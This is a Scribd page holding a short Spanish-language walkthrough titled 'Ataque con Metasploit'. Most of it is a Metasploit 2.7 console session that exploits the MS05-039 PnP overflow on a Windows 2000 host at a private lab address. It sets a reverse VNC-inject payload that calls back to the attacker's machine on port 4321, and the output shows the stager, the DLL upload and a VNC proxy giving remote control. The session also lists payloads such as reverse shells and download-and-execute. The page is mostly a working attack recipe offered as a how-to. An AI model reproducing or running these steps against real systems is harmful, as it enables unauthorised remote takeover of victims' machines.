Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • Ataque Con Metasploit

    Enviado por

    Jesus Rmz Peña
    215 visualizações3 páginas
    1. The document describes using Metasploit to exploit the MS05-039 vulnerability to install a reverse VNC payload on a target system running Windows 2000. 2. Metasploit's ms05_039_pnp exploit and win32_reverse_vncinject payload are used to establish a connection back to the attacker's machine to inject a VNC server. 3. The exploit is executed against a target system at 192.168.202.5, using a reverse connection back to the attacker's machine at 192.168.202.153 on port 4321, which will launch a VNC session on port 5900.

    Descrição original:

    Título original

    Ataque con Metasploit

    Direitos autorais

    © Attribution Non-Commercial (BY-NC)

    Formatos disponíveis

    PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento
    1. The document describes using Metasploit to exploit the MS05-039 vulnerability to install a reverse VNC payload on a target system running Windows 2000. 2. Metasploit's ms05_039_pnp exploit and win32_reverse_vncinject payload are used to establish a connection back to the attacker's machine to inject a VNC server. 3. The exploit is executed against a target system at 192.168.202.5, using a reverse connection back to the attacker's machine at 192.168.202.153 on port 4321, which will launch a VNC session on port 5900.

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    215 visualizações3 páginas

    Ataque Con Metasploit

    Enviado por

    Jesus Rmz Peña
    1. The document describes using Metasploit to exploit the MS05-039 vulnerability to install a reverse VNC payload on a target system running Windows 2000. 2. Metasploit's ms05_039_pnp exploit and win32_reverse_vncinject payload are used to establish a connection back to the attacker's machine to inject a VNC server. 3. The exploit is executed against a target system at 192.168.202.5, using a reverse connection back to the attacker's machine at 192.168.202.153 on port 4321, which will launch a VNC session on port 5900.

    Direitos autorais:

    Attribution Non-Commercial (BY-NC)
    Baixe no formato PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 3

    Ataque con Metasploit

    Tomar el control via VNC, sin tenerlo instalado en ambos lados

    Metasploit version: Framework v2.7

    Exploit: ms05_039_pnp Microsoft PnP MS05-039 Overflow


    Payload: win32_reverse_vncinject Windows Reverse VNC Server Inject

    msf > show exploits

    Metasploit Framework Loaded Exploits


    ====================================

    msf > use ms05_039_pnp


    msf ms05_039_pnp > show options

    Exploit Options
    ===============

    Exploit: Name Default Description


    -------- ------- ------- ---------------------------------------
    required RHOST The target address
    required SMBPIPE browser Pipe name: browser, srvsvc, wkssvc
    optional SMBDOM The domain for specified SMB username
    required RPORT 139 The target port
    optional SMBUSER The SMB username to connect with
    optional SMBPASS The password for specified SMB username

    Target: Target Not Specified

    msf ms05_039_pnp > show payloads

    Metasploit Framework Usable Payloads


    ====================================

    win32_adduser Windows Execute net user /ADD


    win32_bind Windows Bind Shell
    win32_bind_dllinject Windows Bind DLL Inject
    win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
    win32_bind_stg Windows Staged Bind Shell
    win32_bind_stg_upexec Windows Staged Bind Upload/Execute
    win32_bind_vncinject Windows Bind VNC Server DLL Inject
    win32_downloadexec Windows Executable Download and Execute
    win32_exec Windows Execute Command
    win32_passivex Windows PassiveX ActiveX Injection Payload
    win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
    win32_passivex_stg Windows Staged PassiveX Shell
    win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
    win32_reverse Windows Reverse Shell
    win32_reverse_dllinject Windows Reverse DLL Inject
    win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
    win32_reverse_stg Windows Staged Reverse Shell
    win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
    win32_reverse_vncinject Windows Reverse VNC Server Inject
    msf ms05_039_pnp > set PAYLOAD win32_reverse_vncinject
    PAYLOAD -> win32_reverse_vncinject

    msf ms05_039_pnp(win32_reverse_vncinject) > show options

    Exploit and Payload Options


    ===========================

    Exploit: Name Default Description


    -------- ------- ------- ---------------------------------------
    required RHOST The target address
    required SMBPIPE browser Pipe name: browser, srvsvc, wkssvc
    optional SMBDOM The domain for specified SMB username
    required RPORT 139 The target port
    optional SMBUSER The SMB username to connect with
    optional SMBPASS The password for specified SMB username

    Payload: Name Default Description


    -------- -------- ------------------------------- ----------------------------------
    --------
    required VNCDLL /home/framework/data/vncdll.dll The full path the VNC service dll
    required EXITFUNC thread Exit technique: "process", "thread", "seh"
    required LHOST Local address to receive connection
    required AUTOVNC 1 Automatically launch vncviewer
    required VNCPORT 5900 The local port to use for the VNC proxy
    required LPORT 4321 Local port to receive connection

    Target: Target Not Specified

    msf ms05_039_pnp(win32_reverse_vncinject) > set RHOST 192.168.202.5


    RHOST -> 192.168.202.5

    msf ms05_039_pnp(win32_reverse_vncinject) > set RPORT 139


    RPORT -> 139

    msf ms05_039_pnp(win32_reverse_vncinject) > set LHOST 192.168.202.153


    LHOST -> 192.168.202.153

    msf ms05_039_pnp(win32_reverse_vncinject) > show targets

    Supported Exploit Targets


    =========================

    0 Windows 2000 SP0-SP4 English


    1 Windows 2000 SP4 English/French/German/Dutch
    2 Windows 2000 SP4 French
    3 Windows 2000 SP4 Spanish
    4 Windows 2000 SP0-SP4 German
    5 Windows 2000 SP0-SP4 Italian
    6 Windows XP SP1

    msf ms05_039_pnp(win32_reverse_vncinject) > set TARGET 0


    TARGET -> 0
    msf ms05_039_pnp(win32_reverse_vncinject) > exploit

    [*] Starting Reverse Handler.


    [*] Detected a Windows 2000 target
    [*] Sending request...
    [*] Got connection from 192.168.202.153:4321 <-> 192.168.202.5:1314
    [*] Sending Intermediate Stager (89 bytes)
    [*] Sending Stage (2834 bytes)
    [*] Sleeping before sending dll.
    [*] Uploading dll to memory (348170), Please wait...
    [*] Upload completed
    [*] VNC proxy listening on port 5900...
    [*] VNC proxy finished

    Você também pode gostar